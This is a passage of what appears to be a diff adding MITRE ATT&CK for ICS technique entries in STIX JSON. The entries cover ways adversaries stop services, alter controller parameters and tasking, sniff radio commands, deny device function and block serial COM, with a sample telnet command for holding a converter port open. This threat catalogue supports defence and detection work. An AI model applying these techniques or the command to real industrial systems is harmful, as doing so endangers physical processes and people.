2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Process: Process Termination", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Command: Command Execution", + "Service: Service Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0881", + "external_id": "T0881" + }, + { + "source_name": "Enterprise ATT&CK", + "description": 
"Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-04-05T14:15:29.756Z", + "name": "Modify Parameter", + "description": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. \n\nAn adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. 
For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Human-Machine Interface" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0836", + "external_id": "T0836" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Controller Tasking", + "description": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. \n\nAccording to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. 
Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.\n\nTasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Application Log: Application Log Content", + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0821", + "external_id": "T0821" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 
2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Wireless Sniffing", + "description": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. \n\nAdversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) \n\nIn the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. 
April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ICSCoE Japan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0887", + "external_id": "T0887" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018", + "description": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01 ", + "url": "https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf" + }, + { + "source_name": "Gallagher, S. April 2017", + "description": "Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 
2020/12/01 ", + "url": "https://arstechnica.com/information-technology/2017/04/dallas-siren-hack-used-radio-signals-to-spoof-alarm-says-city-manager/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of View", + "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0829", + "external_id": "T0829" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 
2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. 
By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of Control", + "description": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. \n\nMethods of Manipulation of Control include: \n\n* Man-in-the-middle \n* Spoof command message \n* Changing setpoints \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. 
(Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0831", + "external_id": "T0831" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 
2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:16:01.922Z", + "name": "Denial of Service", + "description": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. \n\nSome ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) \n\nAdversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. \n\nAdversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. 
(Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0814", + "external_id": "T0814" + }, + { + "source_name": "Common Weakness Enumeration January 2019", + "description": "Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource Consumption Retrieved. 2019/03/14 ", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "source_name": "ICS-CERT April 2017", + "description": "ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01" + }, + { + "source_name": "MITRE March 2018", + "description": "MITRE 2018, March 22 CVE-2015-5374 Retrieved. 
2019/03/14 ", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5374" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T21:02:54.674Z", + "name": "Block Serial COM", + "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. 
One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Process/Event Alarm", + "Process: Process Termination", + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0805", + "external_id": "T0805" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Role Identification", + "description": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. 
By collecting this role-based data, an adversary can construct a more targeted attack.\n\nFor example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0850", + "external_id": "T0850" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command-Line Interface", + "description": "Adversaries may utilize command-line 
interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Application Log: Application Log Content", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0807", + "external_id": "T0807" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 
2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1059" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Point & Tag Identification", + "description": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. \n\nCollecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Data Historian", + "Control Server", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0861", + "external_id": "T0861" + }, + { + "source_name": 
"Dennis L. Sloatman September 2016", + "description": "Dennis L. Sloatman 2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19 ", + "url": "https://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-09-26T16:50:56.401Z", + "name": "Device Restart/Shutdown", + "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/techniques/T0816", + "external_id": "T0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "User Execution", + "description": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. \n\nAdversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. 
